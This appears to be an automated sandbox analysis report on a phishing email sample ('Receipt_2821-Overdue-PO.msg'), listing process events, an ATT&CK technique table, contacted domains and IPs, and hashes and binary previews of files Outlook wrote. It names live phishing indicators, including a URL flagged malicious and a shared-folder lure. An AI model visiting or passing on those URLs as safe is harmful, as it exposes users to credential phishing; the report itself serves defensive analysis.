Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
1
Process Injection
LSASS Memory12
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Extra Window Memory Injection
1
Extra Window Memory Injection
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
static.cloudflareinsights.com0%VirustotalBrowse
fp2c5c.wac.kappacdn.net0%VirustotalBrowse
cs6.wpc.omegacdn.net0%VirustotalBrowse
cdn.bizibly.com0%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
star-mini.c10r.facebook.com
157.240.229.35
truefalse
    high
    o1220052.ingest.sentry.io
    34.120.195.249
    truefalse
      high
      tlc.ongkitin.com
      172.67.181.25
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          my.visme.co
          104.26.14.44
          truefalse
            high
            static.cloudflareinsights.com
            104.16.80.73
            truefalseunknown
            rkq.6gniu68.ru
            104.21.95.100
            truefalse
              unknown
              ad.doubleclick.net
              142.251.167.149
              truefalse
                high
                cdn-cf.vidyard.com
                18.165.83.37
                truefalse
                  high
                  assets.visme.co
                  104.26.15.44
                  truefalse
                    high
                    a.visme.co
                    104.26.14.44
                    truefalse
                      high
                      www.shopify.com
                      185.146.173.20
                      truefalse
                        high
                        cdn.shopify.com
                        23.227.60.200
                        truefalse
                          high
                          adservice.google.com
                          142.251.16.156
                          truefalse
                            high
                            stats.g.doubleclick.net
                            142.251.111.154
                            truefalse
                              high
                              gtm.shopify.com
                              34.36.217.40
                              truefalse
                                high
                                scontent.xx.fbcdn.net
                                31.13.66.19
                                truefalse
                                  high
                                  cs6.wpc.omegacdn.net
                                  72.21.81.26
                                  truefalseunknown
                                  googleads.g.doubleclick.net
                                  172.253.122.155
                                  truefalse
                                    high
                                    static-bundles.visme.co
                                    104.26.15.44
                                    truefalse
                                      high
                                      www.google.com
                                      142.251.111.103
                                      truefalse
                                        high
                                        analytics.google.com
                                        172.253.122.138
                                        truefalse
                                          high
                                          fp2c5c.wac.kappacdn.net
                                          152.199.2.76
                                          truefalseunknown
                                          dashboard.visme.co
                                          172.67.74.210
                                          truefalse
                                            high
                                            fast.wistia.com
                                            unknown
                                            unknownfalse
                                              high
                                              cdn.bizibly.com
                                              unknown
                                              unknownfalseunknown
                                              cdn.vidyard.com
                                              unknown
                                              unknownfalse
                                                high
                                                cdn.bizible.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  www.facebook.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    connect.facebook.net
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      play.vidyard.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        assets.vidyard.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          NameMaliciousAntivirus DetectionReputation
                                                          https://my.visme.co/view/319jm3x1-paragon-rapid-technology-ltd#s1false
                                                            high
                                                            https://www.shopify.com/false
                                                              high
                                                              https://tlc.ongkitin.com/ywhamyco/true
                                                                unknown
                                                                https://a.visme.co/false
                                                                  high
                                                                  https://play.vidyard.com/V67aTvh67CARSGvSWPizgw?disable_popouts=1&type=inline&v=4.3.14false
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    172.253.122.138
                                                                    analytics.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    204.79.197.200
                                                                    unknownUnited States
                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    152.199.2.76
                                                                    fp2c5c.wac.kappacdn.netUnited States
                                                                    15133EDGECASTUSfalse
                                                                    172.253.63.84
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.251.111.103
                                                                    www.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    172.253.63.113
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.251.163.105
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    104.16.80.73
                                                                    static.cloudflareinsights.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    142.251.163.148
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    151.101.193.181
                                                                    unknownUnited States
                                                                    54113FASTLYUSfalse
                                                                    142.251.179.148
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.250.31.94
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    35.190.80.1
                                                                    a.nel.cloudflare.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    1.1.1.1
                                                                    unknownAustralia
                                                                    13335CLOUDFLARENETUSfalse
                                                                    31.13.66.19
                                                                    scontent.xx.fbcdn.netIreland
                                                                    32934FACEBOOKUSfalse
                                                                    172.253.63.97
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    157.240.229.35
                                                                    star-mini.c10r.facebook.comUnited States
                                                                    32934FACEBOOKUSfalse
                                                                    172.253.122.95
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    239.255.255.250
                                                                    unknownReserved
                                                                    unknownunknownfalse
                                                                    104.26.14.44
                                                                    my.visme.coUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    142.250.31.147
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.251.163.207
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    52.182.143.213
                                                                    unknownUnited States
                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    13.107.21.200
                                                                    unknownUnited States
                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    23.227.60.200
                                                                    cdn.shopify.comCanada
                                                                    62679SHOPIFYASN1CAfalse
                                                                    142.251.167.149
                                                                    ad.doubleclick.netUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.251.16.156
                                                                    adservice.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    172.253.62.95
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.251.167.148
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    172.253.122.155
                                                                    googleads.g.doubleclick.netUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.251.167.94
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    104.21.95.100
                                                                    rkq.6gniu68.ruUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    172.253.62.97
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    185.146.173.20
                                                                    www.shopify.comSweden
                                                                    200760ELOGIC-ASElogicSrl-CloudServicesITfalse
                                                                    104.26.15.44
                                                                    assets.visme.coUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    34.36.217.40
                                                                    gtm.shopify.comUnited States
                                                                    2686ATGS-MMD-ASUSfalse
                                                                    18.165.83.37
                                                                    cdn-cf.vidyard.comUnited States
                                                                    3MIT-GATEWAYSUSfalse
                                                                    172.253.115.94
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    52.113.194.132
                                                                    unknownUnited States
                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    142.251.111.154
                                                                    stats.g.doubleclick.netUnited States
                                                                    15169GOOGLEUSfalse
                                                                    72.21.81.26
                                                                    cs6.wpc.omegacdn.netUnited States
                                                                    15133EDGECASTUSfalse
                                                                    142.251.163.139
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.251.167.154
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    172.67.181.25
                                                                    tlc.ongkitin.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    151.101.1.181
                                                                    unknownUnited States
                                                                    54113FASTLYUSfalse
                                                                    142.251.163.138
                                                                    unknownUnited States
                                                                    15169GOOGLEUSfalse
                                                                    151.101.2.132
                                                                    unknownUnited States
                                                                    54113FASTLYUSfalse
                                                                    172.67.74.210
                                                                    dashboard.visme.coUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    172.67.144.70
                                                                    unknownUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    34.120.195.249
                                                                    o1220052.ingest.sentry.ioUnited States
                                                                    15169GOOGLEUSfalse
                                                                    IP
                                                                    192.168.2.4
                                                                    192.168.2.18
                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                    Analysis ID:1417065
                                                                    Start date and time:2024-03-28 15:19:21 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:21
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • EGA enabled
                                                                    Analysis Mode:stream
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Receipt_2821-Overdue-PO.msg
                                                                    Detection:MAL
                                                                    Classification:mal48.phis.winMSG@24/238@96/318
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .msg
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 52.113.194.132
                                                                    • Excluded domains from analysis (whitelisted): ecs.office.com, s-0005.s-msedge.net, ecs.office.trafficmanager.net, s-0005-office.config.skype.com, ecs-office.s-0005.s-msedge.net
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):231348
                                                                    Entropy (8bit):4.392939485810057
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B449B06728028AE2C2EC1D133903F4B9
                                                                    SHA1:4817823F13C18112AD62764BAC81016FA1C8E364
                                                                    SHA-256:D5A7F0E0A35F97BA1E3BE8C8BE26FF65885646EBAA85EBDBAAC365A8F8EE5EBA
                                                                    SHA-512:D8E4CEF4A54F0B0AB4C09277EA8621A59301751F5109066FC72C24F2659C2E76684864FD257314E26C27211EE236529DA03CDCBC0B2C7DABE07EF57D4B16594E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:TH02...... ..`.........SM01X...,.....T.............IPM.Activity...........h...............h............H..h.?.......D....h...........H..h\nor ...ppDa...h.n..0...@.?....h..@............h........_`.j...h..@.@...I..w...h....H...8..j...0....T...............d.........2h...............k..........7...!h.............. h..e.....X.?...#h....8.........$h.......8....."h8...........'h..h...........1h..@.<.........0h....4.....j../h....h......jH..h....p....?...-h .........?...+hO.@.....?................. ..............F7..............FIPM.Activity.st.Form.e..Standard.tanJournal Entry.pdIPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.000Microsoft.ofThis form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:XML 1.0 document, ASCII text, with very long lines (1869), with no line terminators
                                                                    Category:modified
                                                                    Size (bytes):1869
                                                                    Entropy (8bit):5.080331913373281
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4BF5EFE1F4DB1C49D2707335AC082185
                                                                    SHA1:066AEC6049EF3F5DAB95F8A0CC288D43E29EF68A
                                                                    SHA-256:0CE47843F9D80E1460DFC73DF9EE862128B9FAB5DC19E1991F03EAD1812B78EC
                                                                    SHA-512:AFCB840E73334DDA74C8D61AF7D09F7433106A05F7956059F90A3D3CA208AC65EB14AF88879D2AEC7614095394EC941C409F659AAEA0285E3B50AAF95E2EF70D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>12</Count><Resource><Id>Aptos Narrow_26215424</Id><LAT>2023-10-06T10:24:51Z</LAT><key>31558910439.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos_45876480</Id><LAT>2023-10-06T10:24:51Z</LAT><key>27160079615.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2023-10-06T10:24:51Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876482</Id><LAT>2023-10-06T10:24:51Z</LAT><key>29442803203.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876480</Id><LAT>2023-10-06T10:24:51Z</LAT><key>30264859306.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-06T10:24:51Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Res
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):0.045499034311811015
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C152C4C087C63D5157712942132E8794
                                                                    SHA1:9A77F83B40DCE52E30AE44AFBC669F0513BF30FA
                                                                    SHA-256:A64A51EC1B007D8FB337539ACD108F6FE4F2C0C5FE97CCB80A9FE19E9EB39A62
                                                                    SHA-512:C04FF48615EE69D19AB5D18BD3CDD90E0AD4ABA92E76EF4B147F9A41221F560E621D5E0AEE0475F2642A27D46CBEE228EA80FEE94EAFF795DECB31732B81A63C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:..-......................#a...T._..e..}F:q......-......................#a...T._..e..}F:q............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                    Category:dropped
                                                                    Size (bytes):49472
                                                                    Entropy (8bit):0.4809611650809904
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:02ABF9F06DAF2E3FE41FF5989ED769CE
                                                                    SHA1:819F8F362A6272A85363FD69FE560FF96FC6FEA7
                                                                    SHA-256:2BAAF8E04F104ECA3611F6F231FA8E6DF7DAD05B4ACA734D5F4A5BEC54E58DDB
                                                                    SHA-512:FA82F0B5FD694B61CB57277658FCE8FE9BCBF58DB1E1D6384886D3382B64F335BB84FD0D68EEA6B863A566D70629760906BC8AD28A6032FDF8615E78B030AEA4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:7....-.........._..e..}F:h"r8.0........_..e..}F......R.SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 602x59, components 3
                                                                    Category:dropped
                                                                    Size (bytes):8792
                                                                    Entropy (8bit):7.93011860203988
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:66EE438D4B05028FF61F8613A062C44B
                                                                    SHA1:D53BA3D41D2242616F6C9A800C31B34FAF8293E4
                                                                    SHA-256:12958F9CC4667E347C8B0B67D949CFEE353058E196DF5382FEBA2330468C342A
                                                                    SHA-512:4FBEAEED8AAC9853568124E040DE8FC32DE628973930BB0EFB8E863BD9FB0D5E6A90B22D607D50632C70460B7EFCD247A787EB8CE62D90AD21F35E4FEDC29EB7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:......JFIF.....`.`.....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......;.Z.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....O..)..$.Q!wn.;.Y....Q..].}.*.b..W-|]*.Sz..W..X|%\F.Z..Dr.W......v.O9......y....<..O...e....Wv...uK+.oq.>.....h....H...N...W..j...i..$0.q*...v<(..D.}w...@...?.G..\..t.YI..-Y..U.......m.....sB...i..U...?._.%..>......./......)..[..\....z?.U...?..I..~............+..U.......\....z?.......a../......)..[..\....z?.U...?..I..~............+..U...
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 98x70, components 3
                                                                    Category:dropped
                                                                    Size (bytes):3352
                                                                    Entropy (8bit):7.810640683968901
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8201DAA25C44299E8A7ADA56664F1233
                                                                    SHA1:7625DB545E007B1EDE412D317C6BBD68ECF2A254
                                                                    SHA-256:36D82E1DDA68BA3BEDD6576B6CB464D47FE7F4BCE4FB421543E0A78C24C20EE5
                                                                    SHA-512:165AB131CE92E6E8C0E02CD29AAA1A059522EC2A2ECC88B383A2D84027030457C58F829CE7742EC284648F5D7344212139BFC23C523043430478139898EB693C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:......JFIF.....`.`.....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......F.b.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1....L.h.|..g.;.....'...o.xe..hZb..$....)|%.."~...^0......!....;..6.$...,@....i'=....<7.F.@.>.e).....+.n.:g.Ce.x7Q{.......Go.yo.x.\..............b$".....6.F.@@,...;./.\..D..#.y.$&.IX......I..M.h..'........K.............*..e..N.T..!KD".@?vG8ny..g.:G..2@o.[......w.@.|..........xo...o..'.Q............."..c.k.%..x..d.c...,y;..%.....Gj..5.....,....(.G.:g.<.
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):5884
                                                                    Entropy (8bit):3.229787083933241
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8C711E6FC5BBBD12633490BA11115309
                                                                    SHA1:A77DBAF06AF1916D27E4DCB876F68E508303E15F
                                                                    SHA-256:095F85A47CA9462BC42AC89760F27674C3CF15DCD3D72127CFD81CBB31F0DCF6
                                                                    SHA-512:F17986B858113205A6649BE96DCF4BF5DE7934FBFB85C686F6BA4934039838EBA0993059726DBCAFD44DB2E838B625569690C47F6979908186713FE5B46A6720
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:....R.o.b.s.o.n. .T.u.r.n.b.u.l.l. .S.h.a.r.e.d. .a. .f.o.l.d.e.r. .w.i.t.h. .y.o.u.....R.o.b.s.o.n. .T.u.r.n.b.u.l.l. .S.h.a.r.e.d...D.o.c.u.m.e.n.t.". .w.i.t.h. .y.o.u...................................................................................................................................................................................................................................................................................................................................................................V...X...................................................&...(......................................................................................................................................................................................................................................................$..d....a$......$.a$.....$..$.If....:V.......t.....6......4........4........a.........$.a$.*...$..$.If........!v..h.#v....:V.......t.....6......5.......4........4.......
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:ASCII text, with very long lines (28775), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):20971520
                                                                    Entropy (8bit):0.16080918750716736
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:02D71F8C9EE71E60B9EDC3B44E1E1B8D
                                                                    SHA1:3D37D406E8BEA425DF245376177E084D07EB5A91
                                                                    SHA-256:7D9ADB0DCAC216E53FF20E44246C28DC9D36AB8E3EA8D1711A7B0FF20CE8BAB9
                                                                    SHA-512:531012F2E0A9FB1E5A66F833C9BF0E64A9CEFFF86530B03BE35C6273427EF6DC8643FD214FEA85098E85D85ED0998B33437277DB08AE9280FF3DA6D9F1C2C53F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/28/2024 14:19:51.415.OUTLOOK (0xF0C).0xFDC.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":26,"Time":"2024-03-28T14:19:51.415Z","Contract":"Office.System.Activity","Activity.CV":"TGoX7JUF5UKNpydpnyb42g.4.11","Activity.Duration":12,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...03/28/2024 14:19:51.431.OUTLOOK (0xF0C).0xFDC.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":28,"Time":"2024-03-28T14:19:51.431Z","Contract":"Office.System.Activity","Activity.CV":"TGoX7JUF5UKNpydpnyb42g.4.12","Activity.Duration":10919,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVers
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):20971520
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):90112
                                                                    Entropy (8bit):4.4281920887409045
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CF0BAD827A6BA1A2DC79BA7104EEAAA6
                                                                    SHA1:139D7C176D549D735A2121E57EDD5BFB1C63C151
                                                                    SHA-256:3EA936AD76AACBE3EE82BE190B58C7A524A961838E49A2D62D99D6B3E7CD148E
                                                                    SHA-512:E553836F5DF43D9B871E50F2295277A959D60F3E245283EFFBC001520CBAD4AD777C40748D585F2FDD31B4D82D6A28820824F0A63FD703B24B65DBF43333C6AC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:............................................................................`...........'g/.....................eJ..............Zb..2.......................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1............................................................g..Y..........'g/.............v.2._.O.U.T.L.O.O.K.:.f.0.c.:.e.d.6.5.1.6.3.4.1.e.3.1.4.6.1.d.9.f.0.2.2.1.3.7.2.7.e.2.3.1.3.9...C.:.\.U.s.e.r.s.\.n.o.r.d.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.3.2.8.T.1.5.1.9.5.1.0.1.2.8.-.3.8.5.2...e.t.l.......P.P.........o.1.............................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):163840
                                                                    Entropy (8bit):0.34185930622659005
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:62517FBA06DBF4DE3C4A80A50A3CD25D
                                                                    SHA1:CE6076E2D407E6CFE7F9213843A8CA314F7E3366
                                                                    SHA-256:3D9925D3121D5056FA08F68FA7B991B03F2221475A647A200F2E773D6CF9AE92
                                                                    SHA-512:651E63C44225FAB0F745A52B39A8842F2B0B097B35B1A90160F0F0D644D9784D8409347CD7C04578E526E2B6622CDC306931401FFC0F0D3B2A8670330535BDAE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):30
                                                                    Entropy (8bit):1.2389205950315936
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:65D1DE0A52A0EC6FC9B015370179FC2B
                                                                    SHA1:F99B474E79107024DCA4B99675979FECB95350A5
                                                                    SHA-256:6FB386F53872E7CF132BF2B8F28AE9B3B9011E2ECFEA314F8A9057D8EE39A28E
                                                                    SHA-512:9C28D697D08D3C2CFECC8A4E07927B4C3BC7F40E26E746F2D759097879750EC353D26A829FF3952B9DA8EBA1670EB4EB9D396601FF4E5DD38E4894DE08453605
